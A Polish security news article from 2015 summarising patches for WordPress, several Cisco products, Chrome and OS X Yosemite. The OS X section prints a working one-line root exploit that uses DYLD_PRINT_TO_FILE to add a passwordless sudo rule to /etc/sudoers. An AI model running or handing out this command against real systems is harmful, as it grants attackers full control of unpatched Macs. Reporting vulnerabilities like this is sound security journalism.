Aktualizacje zabezpieczeń dla WordPress, Cisco, Chrome, OS X Yosemite

24 lipca, 2015

Wszyscy eksperci w kwestii bezpieczeństwa mówią jednym językiem i są zgodni, że najważniejszą zasadą, która w większym stopniu umożliwia ochronę przed exploitami, złośliwym oprogramowaniem, atakami sieciowymi i atakami na web aplikacje jest aktualizacja oprogramowania. Czy to system Windows, sterowniki, oprogramowanie trzecie oraz antywirusy – każde z ich potrzebuje aktualizacji, a frustrację biorącą się czasem z bardzo żmudnego procesu patchowania należy schować do kieszeni.

W ciągu ostatnich kilku dni dostaliśmy sporo aktualizacji, a oto najważniejsze z nich:

WordPress

Deweloperzy systemu zarządzania treścią (CMS) poinformowali o nowej wersji WordPress 4.2.3, która łata wiele bugów oraz dosyć poważną lukę bezpieczeństwa. Oprócz dwudziestu załatanych mniejszych błędów, zaktualizowana nowa wersja naprawia problem umożliwiający przeprowadzenie ataku XSS, w efekcie którego osoba atakująca mogła uzyskać kontrolę nad stroną oraz podmienić jej zawartość.

O ile to możliwe zaleca się przeprowadzenie aktualizacji WordPressa do wersji 4.2.3

Cisco

Z kolei CISCO, producent routerów, przełączników i sprzętu sieciowego łata swoje trzy produkty:

1. Pierwszym z nich jest switch Cisco Nexus 9000 Series ACI – w jego oprogramowaniu odkryto lukę, konkretnie w konfiguracji zarządzania klastrami sterownika aplikacji Application Policy Infrastructure Controller (APIC). Luka może umożliwić osobie uwierzytelnionej zdalnie uzyskać dostęp do APIC z uprawnieniami roota i wykonać własne polecenie.

2. Dziurę odkryto także w oprogramowaniu IOS XE, która może umożliwić nieuwierzytelnionej osobie zdalnie przeprowadzenie ataku DoS wykorzystuąc lukę w funkcji serwera TFTP. Cisco naprawiło już usterkę.

3. Ostatnia podatność znajduje się w Cisco Unified MeetingPlace Web Conferencing – aplikacji służącej do konferencji internetowej. Atakujący za pośrednictwem spreparowanego żądania HTTP może wykorzystać lukę i zmienić hasła dowolnych użytkowników w celu uzyskania dostępu do aplikacji.

Google Chrome

Przeglądarka Google Chrome otrzymała aktualizację do wersji 44.0.2403.89 dla systemów Windows, Mac i Linux. Załatane zostały liczne luki w zabezpieczeniach, które mogły pozwolić atakującemu na przejęcie kontroli nad atakowanym systemem.

OS X Yosemite 10.10

Firma Apple dodając do nowej wersji swojego systemu zmienną dyld_print_to file, która pozwala dynamicznemu linkerowi rejestrowanie logów i zapisywanie ich do dowolnego pliku, zapomniała o zabezpieczeniu tej funkcji. Odkryta luka umożliwia osobie atakującej uzyskać uprawnienia roota wydając następujące polecenie w powłoce systemowej:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo –s

Na razie użytkownicy wersji 10.10.4 i 10.10.5 Yosemite nie otrzymali aktualizacji. Wersja beta OS X 10.11 El Capitan jest wolna od tej dziury.

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Zapisz się na newsletter

Informacje o cyberbezpieczeństwie prosto na skrzynkę pocztową!

Dodatkowo otrzymasz poradnik „Jak bezpiecznie funkcjonować w cyfrowym świecie”

[ninja_tables id=”27481″]

\r\n <\/div>\r\n<\/div>\r\n","isUserRated":"0","version":"7.6.30","wc_post_id":"17728","isCookiesEnabled":"1","loadLastCommentId":"0","dataFilterCallbacks":[],"phraseFilters":[],"scrollSize":"32","url":"https:\/\/avlab.pl\/wp-admin\/admin-ajax.php","customAjaxUrl":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/utils\/ajax\/wpdiscuz-ajax.php","bubbleUpdateUrl":"https:\/\/avlab.pl\/wp-json\/wpdiscuz\/v1\/update","restNonce":"f5570802f3","is_rate_editable":"0","menu_icon":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg.svg","menu_icon_hover":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg_hover.svg","is_email_field_required":"1"}; var wpdiscuzUCObj = {"msgConfirmDeleteComment":"Are you sure you want to delete this comment?","msgConfirmCancelSubscription":"Are you sure you want to cancel this subscription?","msgConfirmCancelFollow":"Are you sure you want to cancel this follow?","additionalTab":"0"}; -->